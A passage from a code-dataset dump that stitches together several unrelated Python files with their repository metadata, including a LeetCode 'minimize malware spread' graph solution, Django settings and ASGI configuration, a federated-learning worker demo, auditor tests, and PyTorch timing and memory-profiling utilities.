for e_start, e_end in exclude]
is_subparagraph = False
for hazard_level, hazard_idx in subparagraph_hazards:
if self.find_paragraph_start_match(s_text, hazard_level,
hazard_idx + 1, s_exclude):
is_subparagraph = True
if not is_subparagraph:
return starts[i-1]
def find_paragraph_start_match(self, text, p_level, paragraph, exclude=[]):
"""Find the positions for the start and end of the requested label.
p_Level is one of 0,1,2,3; paragraph is the index within that label.
Return None if not present. Does not return results in the exclude
list (a list of start/stop indices). """
if len(p_levels) <= p_level or len(p_levels[p_level]) <= paragraph:
return None
match_starts = [(m.start(), m.end()) for m in re.finditer(
self.p_regex % p_levels[p_level][paragraph], text)]
match_starts = [(start, end) for start,end in match_starts
if all([end < es or start > ee for es, ee in exclude])]
if len(match_starts) == 0:
return None
elif len(match_starts) == 1:
return match_starts[0]
else:
return self.best_start(text, p_level, paragraph, match_starts,
exclude)
def paragraph_offsets(self, text, p_level, paragraph, exclude = []):
"""Find the start/end of the requested paragraph. Assumes the text
does not just up a p_level -- see build_paragraph_tree below."""
start = self.find_paragraph_start_match(text, p_level, paragraph,
exclude)
if start == None:
return None
id_start, id_end = start
end = self.find_paragraph_start_match(text[id_end:], p_level,
paragraph + 1, [(e_start - id_end, e_end - id_end)
for e_start, e_end in exclude])
if end == None:
end = len(text)
else:
end = end[0] + id_end
return (id_start, end)
def paragraphs(self, text, p_level, exclude = []):
"""Return a list of paragraph offsets defined by the level param."""
def offsets_fn(remaining_text, p_idx, exclude):
return self.paragraph_offsets(remaining_text, p_level, p_idx,
exclude)
return segments(text, offsets_fn, exclude)
def build_paragraph_tree(self, text, p_level = 0, exclude = [],
label = tree.label("", [])):
"""
Build a dict to represent the text hierarchy.
"""
subparagraphs = self.paragraphs(text, p_level, exclude)
if subparagraphs:
body_text = text[0:subparagraphs[0][0]]
else:
body_text = text
children = []
for paragraph, (start,end) in enumerate(subparagraphs):
new_text = text[start:end]
new_excludes = [(e[0] - start, e[1] - start) for e in exclude]
new_label = self.inner_label_fn(label,
p_levels[p_level][paragraph])
children.append(self.build_paragraph_tree(new_text, p_level + 1,
new_excludes, new_label))
return tree.node(body_text, children, label)
| [
"[email protected]"
] | |
9e51554a63ea745f2574b28165948e41f852a97e | a90aa4871684f6f24aa5b0daf2ece384418c748b | /basic/python/2_applica/1_scrapy/bloomfilter.py | 868227e7ae9f1616e4f5ff0e2650e336b69c8b7a | [] | no_license | Martians/code | fed5735b106963de79b18cc546624893665066cd | 653e2c595f4ac011aed7102ca26b842d4f6beaaf | refs/heads/master | 2021-07-11T19:22:24.858037 | 2019-02-22T13:04:55 | 2019-02-22T13:04:55 | 110,106,407 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 88 | py |
# https://media.readthedocs.org/pdf/pybloomfiltermmap3/latest/pybloomfiltermmap3.pdf
| [
"[email protected]"
] | |
4af2ccbccc3801bfd03ba5d348228bde9e7d5e13 | fd133e8252dc4ddb8221007f806da336639e9029 | /924_minimize_malware_speed.py | 9ebceeb1693f0f22ca3036256554fcb1d0d201ee | [] | no_license | nikrasiya/Graph-2 | ea331e8470a73eef2f70cbb71f28023f704f1ba2 | 4689f2e0d1a0847ab519715d7659939dad89e001 | refs/heads/master | 2021-05-17T16:21:17.539763 | 2020-04-06T13:18:31 | 2020-04-06T13:18:31 | 250,869,007 | 0 | 0 | null | 2020-03-28T18:44:58 | 2020-03-28T18:44:58 | null | UTF-8 | Python | false | false | 4,082 | py | from typing import List
from collections import defaultdict, Counter
class Solution:
def minMalwareSpread(self, graph: List[List[int]], initial: List[int]) -> int:
"""
https://leetcode.com/problems/minimize-malware-spread/
Time Complexity - O(V*E)
'V' -> vertices
'E' -> edges
Space Complexity - O(V)
"""
self.n = len(graph)
self.colors = [-1] * self.n
c = 0
for i in range(self.n):
self._dfs(i, c, graph)
c += 1
groups = Counter(self.colors)
init_color = [0] * c
for node in initial:
init_color[self.colors[node]] += 1
result = float('inf')
for node in initial:
color = self.colors[node]
count = init_color[color]
if count == 1:
if result == float('inf'):
result = node
elif groups[color] > groups[self.colors[result]]:
result = node
elif groups[color] == groups[self.colors[result]] and node < result:
result = node
if result == float('inf'):
return min(initial)
return result
def _dfs(self, node, color, graph):
# base
if self.colors[node] != -1:
return
# logic
self.colors[node] = color
for i in range(self.n):
if graph[node][i] == 1:
self._dfs(i, color, graph)
# def minMalwareSpread(self, graph: List[List[int]], initial: List[int]) -> int:
# """
# https://leetcode.com/problems/minimize-malware-spread/
# Time Complexity -
# Space Complexity -
# """
# adj_matrix = defaultdict(list)
# initial = sorted(initial)
# # graph
# for node in range(len(graph)):
# for edge in range(len(graph[0])):
# if graph[node][edge] == 1:
# adj_matrix[node].append(edge)
# # make groups
# groups = {}
# counts = {}
# g_name = 0
# min_group_name = None
# max_group_size = float('-inf')
# visited = set()
# for node in initial:
# group, infected_count = self._dfs(initial, visited, adj_matrix, node)
# if group:
# groups[g_name] = group
# counts[g_name] = infected_count
# if infected_count == 1 and len(group) > max_group_size:
# max_group_size = len(group)
# min_group_name = g_name
# g_name += 1
# if min_group_name is None:
# return min(initial)
# return min(set(initial).intersection(groups[min_group_name]))
#
# def _dfs(self, initial, visited, adj_matrix, root):
# if root in visited:
# return None, None
# stack = [root]
# result = []
# initial_count = 0
# while stack:
# cur = stack.pop()
# if cur in initial:
# initial_count += 1
# for edge in adj_matrix[cur]:
# if edge != cur and edge not in visited:
# stack.append(edge)
# if cur not in visited:
# visited.add(cur)
# result.append(cur)
# return result, initial_count
if __name__ == '__main__':
print(Solution().minMalwareSpread([[1, 1, 1], [1, 1, 1], [1, 1, 1]], [1, 2]))
print(Solution().minMalwareSpread([[1, 1, 0], [1, 1, 0], [0, 0, 1]], [0, 1]))
print(Solution().minMalwareSpread([[1, 0, 0], [0, 1, 0], [0, 0, 1]], [0, 2]))
print(Solution().minMalwareSpread([[1, 1, 0], [1, 1, 0], [0, 0, 1]], [0, 1, 2]))
print(Solution().minMalwareSpread([[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 1], [0, 0, 1, 1]], [3, 1]))
print(Solution().minMalwareSpread(
[[1, 0, 0, 0, 0, 0], [0, 1, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0], [0, 0, 0, 1, 1, 0], [0, 0, 0, 1, 1, 0],
[0, 0, 0, 0, 0, 1]], [5, 0]))
| [
"[email protected]"
] | |
77ebbe0d48ff860ba8eab641e85ade6503ca77d9 | f2ab8ccda7203dd37d61facb9978cf74b781c7f1 | /tests/models.py | 2a33a19a5a6c499db6c4c5ca9168a18891a56d61 | [
"MIT"
] | permissive | Apkawa/easy-thumbnails-admin | 1991137224dcd117520b2c114d4012daf803776e | 9d7a38f215cdac53a663b00f1d4ff3a3c2a54eb4 | refs/heads/master | 2021-01-01T15:47:34.334792 | 2017-11-23T10:38:09 | 2017-11-23T10:38:09 | 97,703,157 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | from django.db import models
from easy_thumbnails.fields import ThumbnailerImageField
def upload_to(instance, filename):
return 'example/{}'.format(filename)
class Example(models.Model):
image = ThumbnailerImageField(upload_to=upload_to)
| [
"[email protected]"
] | |
139ecc75596912c669b4ed0216a1514922c50a4c | 605611de5eae63ce4eef388a287a3ef18b52eae7 | /CovidCrowd/settings.py | 95d5f1e4b28e5afba1ede23609cd8a48a22b35cd | [] | no_license | RahulAttarde/CovidCrowd | e6b2e45c222f03112c157403c2d6630d888599d8 | 55740e1ea72cd434aed0a627f6fffb16024a6f17 | refs/heads/master | 2021-04-23T00:02:46.726288 | 2020-03-25T02:45:35 | 2020-03-25T02:45:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,879 | py | """
Django settings for CovidCrowd project.
Generated by 'django-admin startproject' using Django 3.0.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
from decouple import config, Csv
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = config("SECRET_KEY")
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = config("DEBUG")
ALLOWED_HOSTS = config("MY_HOSTS", cast=Csv())
# Application definition
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"django.contrib.gis",
"social_django",
"crispy_forms",
"patients",
"rest_framework",
"django_filters",
"django_tables2",
"debug_toolbar",
"memcache_status",
]
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
"social_django.middleware.SocialAuthExceptionMiddleware",
"debug_toolbar.middleware.DebugToolbarMiddleware",
]
ROOT_URLCONF = "CovidCrowd.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
"social_django.context_processors.backends",
"social_django.context_processors.login_redirect",
],
},
},
]
WSGI_APPLICATION = "CovidCrowd.wsgi.application"
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
"default": {
"ENGINE": "django.contrib.gis.db.backends.spatialite",
"NAME": os.path.join(BASE_DIR, "db.sqlite3"),
}
}
AUTHENTICATION_BACKENDS = (
"social_core.backends.github.GithubOAuth2",
"social_core.backends.twitter.TwitterOAuth",
"social_core.backends.google.GoogleOAuth2",
"django.contrib.auth.backends.ModelBackend",
)
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
},
{"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",},
{"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",},
{"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "Asia/Kolkata"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = "/static/"
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
# Crispy forms
CRISPY_TEMPLATE_PACK = "bootstrap4"
# OAUTH for Social Login
LOGIN_URL = "/login-form"
SOCIAL_AUTH_URL_NAMESPACE = "social"
SOCIAL_AUTH_LOGIN_REDIRECT_URL = "/"
SOCIAL_AUTH_GITHUB_KEY = config("SOCIAL_AUTH_GITHUB_KEY")
SOCIAL_AUTH_GITHUB_SECRET = config("SOCIAL_AUTH_GITHUB_SECRET")
SOCIAL_AUTH_TWITTER_KEY = config("SOCIAL_AUTH_TWITTER_KEY")
SOCIAL_AUTH_TWITTER_SECRET = config("SOCIAL_AUTH_TWITTER_SECRET")
SOCIAL_AUTH_GOOGLE_OAUTH2_KEY = config("SOCIAL_AUTH_GOOGLE_OAUTH2_KEY")
SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET = config("SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET")
# Django REST Framework
REST_FRAMEWORK = {
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
]
}
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
'LOCATION': '127.0.0.1:11211',
}
}
INTERNAL_IPS = [
'127.0.0.1',
] | [
"[email protected]"
] | |
e1752708a0af5efe19acf9209a0dd0734303fa0d | 840b98f14f181f7dbd693f2ee4b3c46e5be59305 | /demos/demo_pycloudmessenger/POM2/NeuralNetworks/pom2_NN_worker_pycloudmessenger.py | 672126432edb472a87502a57beff578247d9307a | [
"Apache-2.0"
] | permissive | Musketeer-H2020/MMLL-Robust | 4ef6b2ff5dff18d4d2b2a403a89d9455ba861e2b | ccc0a7674a04ae0d00bedc38893b33184c5f68c6 | refs/heads/main | 2023-09-01T18:47:46.065297 | 2021-09-28T15:34:12 | 2021-09-28T15:34:12 | 386,264,004 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,614 | py | # -*- coding: utf-8 -*-
'''
@author: Marcos Fernandez Diaz
November 2020
Example of use: python pom2_NN_worker_pycloudmessenger.py --user <user> --password <password> --task_name <task_name> --id <id>
Parameters:
- user: String with the name of the user. If the user does not exist in the pycloudmessenger platform a new one will be created
- password: String with the password
- task_name: String with the name of the task. If the task already exists, an error will be displayed
- id: Integer representing the partition of data to be used by the worker. Each worker should use a different partition, possible values are 0 to 4.
'''
# Import general modules
import argparse
import logging
import json
import numpy as np
import sys, os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # Disables tensorflow warnings
import tensorflow as tf
import onnxruntime
# Add higher directory to python modules path.
sys.path.append("../../../../")
# To be imported from MMLL (pip installed)
from MMLL.nodes.WorkerNode import WorkerNode
from MMLL.comms.comms_pycloudmessenger import Comms_worker as Comms
# To be imported from demo_tools
from demo_tools.task_manager_pycloudmessenger import Task_Manager
from demo_tools.data_connectors.Load_from_file import Load_From_File as DC
from demo_tools.mylogging.logger_v1 import Logger
from demo_tools.evaluation_tools import display, plot_cm_seaborn, create_folders
# Set up logger
logging.basicConfig(
level=logging.ERROR,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
LOGGER = logging.getLogger()
LOGGER.setLevel(logging.DEBUG)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--user', type=str, default=None, help='User')
parser.add_argument('--password', type=str, default=None, help='Password')
parser.add_argument('--task_name', type=str, default=None, help='Name of the task')
parser.add_argument('--id', type=int, default=None, choices=[0, 1, 2, 3, 4], help='The data partition of the worker')
FLAGS, unparsed = parser.parse_known_args()
user_name = FLAGS.user
user_password = FLAGS.password
task_name = FLAGS.task_name
data_partition_id = FLAGS.id # This integer identifies the data partition used for the worker
# Set basic configuration
dataset_name = 'mnist'
verbose = False
pom = 2
model_type = 'NN'
# Create the directories for storing relevant outputs if they do not exist
create_folders("./results/")
# Setting up the logger
logger = Logger('./results/logs/Worker_' + str(user_name) + '.log')
# Load credentials file to use pycloudmessenger
# Note: this part creates the task and waits for the workers to join. This code is intended to be used only at the demos, in Musketeer this part must be done in the client.
display('===========================================', logger, verbose)
credentials_filename = '../../musketeer.json'
try:
with open(credentials_filename, 'r') as f:
credentials = json.load(f)
except:
display('Error - The file musketeer.json is not available, please put it under the following path: "' + os.path.abspath(os.path.join("","../../")) + '"', logger, verbose)
sys.exit()
# Create user and join the task
tm = Task_Manager(credentials_filename)
participant = tm.create_worker_and_join_task(user_name, user_password, task_name, display, logger)
# Creating the comms object
display('Creating WorkerNode under POM %d, communicating through pycloudmessenger' %pom, logger, verbose)
comms = Comms(participant, user_name)
# Creating Workernode
wn = WorkerNode(pom, comms, logger, verbose)
display('-------------------- Loading dataset %s --------------------------' % dataset_name, logger, verbose)
# Load data
# Warning: this data connector is only designed for the demos. In Musketeer, appropriate data
# connectors must be provided
data_file = '../../../../input_data/' + dataset_name + '_demonstrator_data.pkl'
try:
dc = DC(data_file)
except:
display('Error - The file ' + dataset_name + '_demonstrator_data.pkl does not exist. Please download it from Box and put it under the following path: "' + os.path.abspath(os.path.join("","../../../../input_data/")) + '"', logger, verbose)
sys.exit()
# Get train/test data and set training data
[Xtr, ytr, _, _, Xtst, ytst] = dc.get_all_data_Worker(int(data_partition_id))
wn.set_training_data(dataset_name, Xtr, ytr)
display('WorkerNode loaded %d patterns for training' % wn.NPtr, logger, verbose)
# Creating a ML model and start training procedure
wn.create_model_worker(model_type)
display('MMLL model %s is ready for training!' %model_type, logger, verbose)
display('Worker_' + model_type + ' %s is running...' %user_name, logger, verbose)
wn.run()
display('Worker_' + model_type + ' %s: EXIT' %user_name, logger, verbose)
# Retrieving and saving the trained model
display('Retrieving the trained model from WorkerNode', logger, verbose)
model = wn.get_model()
# Warning: this save_model utility is only for demo purposes
output_filename_model = './results/models/Worker_' + str(user_name) + '_' + dataset_name + '_model'
model.save(output_filename_model)
# Making predictions on test data
display('------------- Obtaining predictions------------------------------------\n', logger, verbose)
preprocessors = wn.get_preprocessors()
if preprocessors is not None:
for prep_model in preprocessors: # Apply stored preprocessor sequentially (in the same order received)
Xtst = prep_model.transform(Xtst)
display('Test data transformed using %s' %prep_model.name, logger, verbose)
preds_tst = model.predict(Xtst)
preds_tst = np.argmax(preds_tst, axis=-1) # Labels
y = np.argmax(ytst, axis=-1) # Convert to labels
classes = np.arange(ytst.shape[1]) # 0 to 9
# Evaluating the results
display('------------- Evaluating --------------------------------------------\n', logger, verbose)
# Warning, these evaluation methods are not part of the MMLL library, they are only intended to be used for the demos. Use them at your own risk.
output_filename = 'Worker_' + str(user_name) + '_NN_confusion_matrix_' + dataset_name + '.png'
title = 'NN confusion matrix in test set worker'
plot_cm_seaborn(preds_tst, y, classes, title, output_filename, logger, verbose, normalize=True)
# Load Tf SavedModel and check results
model_loaded = tf.keras.models.load_model(output_filename_model)
preds_tst = model_loaded.predict(Xtst)
preds_tst = np.argmax(preds_tst, axis=-1) # Convert to labels
# Model export to ONXX
output_filename_model = './results/models/Worker_' + str(user_name) + '_' + dataset_name + '_model.onnx'
model.save(output_filename_model)
# Compute the prediction with ONNX Runtime
onnx_session = onnxruntime.InferenceSession(output_filename_model)
onnx_inputs = {onnx_session.get_inputs()[0].name: Xtst}
onnx_output = onnx_session.run(None, onnx_inputs)[0]
onnx_output = np.argmax(onnx_output, axis=-1) # Convert to labels
err_onnx = np.mean((preds_tst.ravel() - onnx_output.ravel())**2)
display('Error in ONNX predictions is %f' %err_onnx, logger, verbose)
| [
"[email protected]"
] | |
f327656c3c6c957763b8883c4183d103b33e956c | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/verbs/_linking.py | 619af3537e5435c213053702bea9f7364b783fca | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 228 | py |
from xai.brain.wordbase.verbs._link import _LINK
#calss header
class _LINKING(_LINK, ):
def __init__(self,):
_LINK.__init__(self)
self.name = "LINKING"
self.specie = 'verbs'
self.basic = "link"
self.jsondata = {}
| [
"[email protected]"
] | |
e2e0a5e05ade4bf1b990a627802943af3a19626d | f5c7d50973d47abd555502470b300b3c70af9fa5 | /voting/asgi.py | 856ae28db6db7b31736db9f3585a818ef2de5cc0 | [
"MIT"
] | permissive | jess-monter/voting_back | 62b67fafcfa8a9b7feebbca463c5055efdff7d98 | de54218f01095f5090d490cabf32a86b1e608925 | refs/heads/main | 2023-04-06T16:00:45.066076 | 2021-04-14T07:51:10 | 2021-04-14T07:51:10 | 336,810,613 | 0 | 0 | MIT | 2021-04-14T07:51:11 | 2021-02-07T14:46:05 | Python | UTF-8 | Python | false | false | 756 | py | """
ASGI config for voting project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "voting.settings")
django_asgi_app = get_asgi_application()
from channels.auth import AuthMiddlewareStack
from channels.routing import ProtocolTypeRouter, URLRouter
import voting.apps.notifications.routing
application = ProtocolTypeRouter(
{
"http": django_asgi_app,
"websocket": AuthMiddlewareStack(
URLRouter(voting.apps.notifications.routing.websocket_urlpatterns)
),
}
)
| [
"="
] | = |
78430575c8a6091691a2baff513bfbe12212aa04 | e8805bf7c79da1b63d36c3535b8f5ba7d97b6b56 | /tests/test_auditor/test_auditor_bookmark.py | 05eaeea64b067419856d25819c257ca50d667dd1 | [
"MIT"
] | permissive | wbuchwalter/polyaxon | 9ad681e37065e8aa05741fb7d63b170e4c1fdfe6 | a01396ea86a74082c457bfbc2c91d283b6ff6fba | refs/heads/master | 2020-03-23T08:34:42.248328 | 2018-07-17T18:29:06 | 2018-07-17T18:29:06 | 141,334,939 | 0 | 0 | MIT | 2018-07-17T19:35:22 | 2018-07-17T19:35:21 | null | UTF-8 | Python | false | false | 2,819 | py | # pylint:disable=ungrouped-imports
from unittest.mock import patch
import pytest
import activitylogs
import auditor
import tracker
from event_manager.events import bookmark as bookmarks_events
from tests.utils import BaseTest
@pytest.mark.auditor_mark
class AuditorBookmarksTest(BaseTest):
"""Testing subscribed events"""
DISABLE_RUNNER = False
def setUp(self):
auditor.validate()
auditor.setup()
tracker.validate()
tracker.setup()
activitylogs.validate()
activitylogs.setup()
super().setUp()
@patch('tracker.service.TrackerService.record_event')
@patch('activitylogs.service.ActivityLogService.record_event')
def test_build_bookmarks_viewed(self, activitylogs_record, tracker_record):
auditor.record(event_type=bookmarks_events.BOOKMARK_BUILD_JOBS_VIEWED,
actor_id=1,
id=2)
assert tracker_record.call_count == 1
assert activitylogs_record.call_count == 1
@patch('tracker.service.TrackerService.record_event')
@patch('activitylogs.service.ActivityLogService.record_event')
def test_job_bookmarks_viewed(self, activitylogs_record, tracker_record):
auditor.record(event_type=bookmarks_events.BOOKMARK_JOBS_VIEWED,
actor_id=1,
id=1)
assert tracker_record.call_count == 1
assert activitylogs_record.call_count == 1
@patch('tracker.service.TrackerService.record_event')
@patch('activitylogs.service.ActivityLogService.record_event')
def test_experiment_bookmarks_viewed(self, activitylogs_record, tracker_record):
auditor.record(event_type=bookmarks_events.BOOKMARK_EXPERIMENTS_VIEWED,
actor_id=1,
id=2)
assert tracker_record.call_count == 1
assert activitylogs_record.call_count == 1
@patch('tracker.service.TrackerService.record_event')
@patch('activitylogs.service.ActivityLogService.record_event')
def test_experiment_group_bookmarks_viewed(self, activitylogs_record, tracker_record):
auditor.record(event_type=bookmarks_events.BOOKMARK_EXPERIMENT_GROUPS_VIEWED,
actor_id=1,
id=2)
assert tracker_record.call_count == 1
assert activitylogs_record.call_count == 1
@patch('tracker.service.TrackerService.record_event')
@patch('activitylogs.service.ActivityLogService.record_event')
def test_project_bookmarks_viewed(self, activitylogs_record, tracker_record):
auditor.record(event_type=bookmarks_events.BOOKMARK_PROJECTS_VIEWED,
actor_id=1,
id=1)
assert tracker_record.call_count == 1
assert activitylogs_record.call_count == 1
| [
"[email protected]"
] | |
c3f387488e18415441d92be7b503abfd69d40ad1 | 8e97cb7c8668a9061683ea3ba893dab32029fac9 | /pytorch_toolkit/instance_segmentation/segmentoly/utils/profile.py | 9c17d0e496ee59a819333e28ce8963262200b8d3 | [
"Apache-2.0"
] | permissive | DmitriySidnev/openvino_training_extensions | e01703bea292f11ffc20d50a1a06f0565059d5c7 | c553a56088f0055baba838b68c9299e19683227e | refs/heads/develop | 2021-06-14T06:32:12.373813 | 2020-05-13T13:25:15 | 2020-05-13T13:25:15 | 180,546,423 | 0 | 1 | Apache-2.0 | 2019-04-15T13:39:48 | 2019-04-10T09:17:55 | Python | UTF-8 | Python | false | false | 14,154 | py | """
Copyright (c) 2019 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import gc
import operator as op
import time
from collections import defaultdict
from functools import reduce, wraps
import numpy as np
import torch
class Timer(object):
def __init__(self, warmup=0, smoothing=0.5, cuda_sync=True):
self.warmup = warmup
self.cuda_sync = cuda_sync
self.total_time = 0.
self.calls = 0
self.start_time = 0.
self.diff = 0.
self.average_time = 0.
self.smoothed_time = 0.
self.smoothing_alpha = smoothing
self.min_time = float('inf')
self.max_time = 0.
self.reset()
def tic(self):
if self.cuda_sync and torch.cuda.is_available():
torch.cuda.synchronize()
self.start_time = time.time()
def toc(self, average=True, smoothed=False):
if self.cuda_sync and torch.cuda.is_available():
torch.cuda.synchronize()
self.diff = time.time() - self.start_time
self.calls += 1
if self.calls <= self.warmup:
return self.diff
self.total_time += self.diff
self.average_time = self.total_time / (self.calls - self.warmup)
self.smoothed_time = self.smoothed_time * self.smoothing_alpha + self.diff * (1.0 - self.smoothing_alpha)
self.min_time = min(self.min_time, self.diff)
self.max_time = max(self.max_time, self.diff)
if average:
return self.average_time
elif smoothed:
return self.smoothed_time
else:
return self.diff
def __enter__(self):
self.tic()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.toc()
def reset(self):
self.total_time = 0.
self.calls = 0
self.start_time = 0.
self.diff = 0.
self.average_time = 0.
class DummyTimer(Timer):
def __init__(self):
super().__init__()
def tic(self):
pass
def toc(self, *args, **kwargs):
return 0
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
pass
def timed(func):
@wraps(func)
def wrapper_timer(self, *args, **kwargs):
if not hasattr(self, '_timers'):
self._timers = defaultdict(Timer)
with self._timers[func.__name__]:
value = func(self, *args, **kwargs)
return value
return wrapper_timer
def print_timing_stats(timers, key='average_time'):
print('{:>40}: {:>10} [{:>10}, {:>10}] {:>10} {:>10}'.format('name', 'average', 'min', 'max', '#calls', 'total'))
for k, v in sorted(timers.items(), key=lambda x: op.attrgetter(key)(x[1]), reverse=True):
print('{:>40}: {:10.2f} [{:10.2f}, {:10.2f}] {:10d} {:10.2f}'.format(k, 1000 * v.average_time,
1000 * v.min_time, 1000 * v.max_time,
v.calls, 1000 * v.total_time))
print('-' * 40)
def pretty_shape(shape):
if shape is None:
return 'None'
return '×'.join(map(str, shape))
def pretty_size(size, units='G', precision=2, base=1024):
if units is None:
if size // (base ** 3) > 0:
val = str(round(size / (base ** 3), precision))
units = 'G'
elif size // (base ** 2) > 0:
val = str(round(size / (base ** 2), precision))
units = 'M'
elif size // base > 0:
val = str(round(size / base, precision))
units = 'K'
else:
val = str(size)
units = ''
else:
if units == 'G':
val = str(round(size / (base ** 3), precision))
elif units == 'M':
val = str(round(size / (base ** 2), precision))
elif units == 'K':
val = str(round(size / base, precision))
else:
val = str(size)
return val, units
def dump_tensors(gpu_only=True):
"""Prints a list of the Tensors being tracked by the garbage collector."""
total_size = 0
for obj in gc.get_objects():
try:
if torch.is_tensor(obj):
if not gpu_only or obj.is_cuda:
print('%s:%s%s %s' % (type(obj).__name__,
' GPU' if obj.is_cuda else '',
' pinned' if obj.is_pinned else '',
pretty_shape(obj.size())))
total_size += obj.numel()
elif hasattr(obj, 'data') and torch.is_tensor(obj.data):
if not gpu_only or obj.is_cuda:
print('%s → %s:%s%s%s%s %s' % (type(obj).__name__,
type(obj.data).__name__,
' GPU' if obj.is_cuda else '',
' pinned' if obj.data.is_pinned else '',
' grad' if obj.requires_grad else '',
' volatile' if obj.volatile else '',
pretty_shape(obj.data.size())))
total_size += obj.data.numel()
except Exception as e:
pass
print('Total size:', total_size)
def list_allocated_tensors():
memtable = []
for obj in gc.get_objects():
if torch.is_tensor(obj):
memtable.append(dict(obj=obj,
size=(reduce(op.mul, obj.size())
if len(obj.size()) > 0
else 0) * obj.element_size()))
memtable = sorted(memtable, key=op.itemgetter('size'))
for i, item in enumerate(memtable):
obj = item['obj']
print('{:03}: {:>10} {:>30} {:>25} {:>10}'.format(i, item['size'], str(np.array(obj.shape)),
str(obj.type()), str(obj.device)))
def list_parameters(module):
memtable = []
for name, x in module.named_parameters():
memtable.append(dict(name=name,
shape=np.array(x.data.shape),
size=int(x.data.numel() * x.data.element_size()),
has_grad=x.requires_grad,
grad_shape=np.array(x.grad.shape) if x.requires_grad else None,
grad_size=int(x.grad.numel() * x.grad.element_size()) if x.requires_grad else 0
)
)
total_data_size = 0
total_grad_size = 0
for i, item in enumerate(memtable):
print('{:03} {:>60}: {:>15} {:>15} {:>15} {:>15}'.format(i,
item['name'],
pretty_size(item['size'], units='M')[0],
pretty_shape(item['shape']),
pretty_size(item['grad_size'], units='M')[0],
pretty_shape(item['grad_shape'])))
total_data_size += item['size']
total_grad_size += item['grad_size']
total_mem_size = list(pretty_size(total_data_size)) + list(pretty_size(total_grad_size))
print('TOTAL MEMORY USAGE FOR MODEL PARAMETERS: data: {} {}B grad: {} {}B'.format(*total_mem_size))
class FeatureMapsTracer(object):
fwd_tensors_registry = set()
bwd_tensors_registry = set()
@staticmethod
def reset(*args, **kwargs):
FeatureMapsTracer.summary_fwd()
FeatureMapsTracer.summary_bwd()
del FeatureMapsTracer.fwd_tensors_registry
FeatureMapsTracer.fwd_tensors_registry = set()
del FeatureMapsTracer.bwd_tensors_registry
FeatureMapsTracer.bwd_tensors_registry = set()
@staticmethod
def summary_fwd(*args, **kwargs):
total_data_size = FeatureMapsTracer.get_total_size(list(FeatureMapsTracer.fwd_tensors_registry))
print('TOTAL FORWARD DATA BLOBS SIZE: {} {}B'.format(*pretty_size(total_data_size)))
